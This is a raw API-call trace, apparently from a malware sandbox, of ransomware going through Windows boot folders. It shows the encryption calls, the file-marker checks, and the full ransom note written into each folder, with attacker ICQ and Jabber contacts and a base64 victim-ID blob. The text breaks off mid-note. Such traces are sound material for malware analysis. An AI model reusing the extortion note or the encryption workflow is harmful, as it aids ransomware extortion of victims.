lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.880] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.880] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.880] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.880] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0121.880] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.880] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.880] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.880] lstrlenW (lpString=".testttjffg") returned 11 [0121.881] StrStrW (lpFirst="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.881] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.881] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.881] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.881] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.882] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.882] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\#Decrypt#.txt") returned 31 [0121.882] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\#Decrypt#.txt" (normalized: "c:\\boot\\ja-jp\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0121.882] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.883] WriteFile (in: hFile=0x150, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.884] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.884] WriteFile (in: hFile=0x150, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.885] CloseHandle (hObject=0x150) returned 1 [0121.885] GetProcessHeap () returned 0x780000 [0121.885] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.885] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0121.885] lstrcmpiW (lpString1="ko-KR", lpString2="Windows") returned -1 [0121.886] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0121.886] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0121.886] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0121.886] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.886] GetProcessHeap () returned 0x780000 [0121.886] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.886] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\*") returned 19 [0121.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.939] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.939] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\.") returned 19 [0121.939] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.939] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.940] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.940] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\..") returned 20 [0121.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.940] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.941] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.941] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0121.941] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.941] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.941] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.941] lstrlenW (lpString=".testttjffg") returned 11 [0121.941] StrStrW (lpFirst="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.941] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.942] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.942] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.942] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.942] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.943] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\#Decrypt#.txt") returned 31 [0121.943] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\#Decrypt#.txt" (normalized: "c:\\boot\\ko-kr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0121.944] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.944] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.945] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.945] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.946] CloseHandle (hObject=0x1dc) returned 1 [0121.946] GetProcessHeap () returned 0x780000 [0121.946] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.946] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0121.947] lstrcmpiW (lpString1="memtest.exe", lpString2="Windows") returned -1 [0121.947] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0121.947] StrStrIW (lpFirst="memtest.exe", lpSrch=".horseleader") returned 0x0 [0121.947] lstrcmpW (lpString1="memtest.exe", lpString2="#Decrypt#.txt") returned 1 [0121.947] lstrcmpW (lpString1="memtest.exe", lpString2="_uninstalling_.png") returned 1 [0121.947] lstrlenW (lpString=".testttjffg") returned 11 [0121.947] StrStrW (lpFirst="\\\\?\\C:\\Boot\\memtest.exe", lpSrch=".testttjffg") returned 0x0 [0121.947] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.948] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.948] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.948] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0121.948] lstrcmpiW (lpString1="nb-NO", lpString2="Windows") returned -1 [0121.948] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0121.949] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0121.949] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0121.949] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.949] GetProcessHeap () returned 0x780000 [0121.949] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.949] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\*") returned 19 [0121.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.950] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.950] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\.") returned 19 [0121.950] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.950] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.950] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.951] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\..") returned 20 [0121.951] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.951] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.951] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.951] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.951] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0121.951] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.951] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.951] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.951] lstrlenW (lpString=".testttjffg") returned 11 [0121.952] StrStrW (lpFirst="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.952] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0122.205] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0122.205] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.488] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.488] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.489] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\#Decrypt#.txt") returned 31 [0124.489] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\#Decrypt#.txt" (normalized: "c:\\boot\\nb-no\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.734] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see 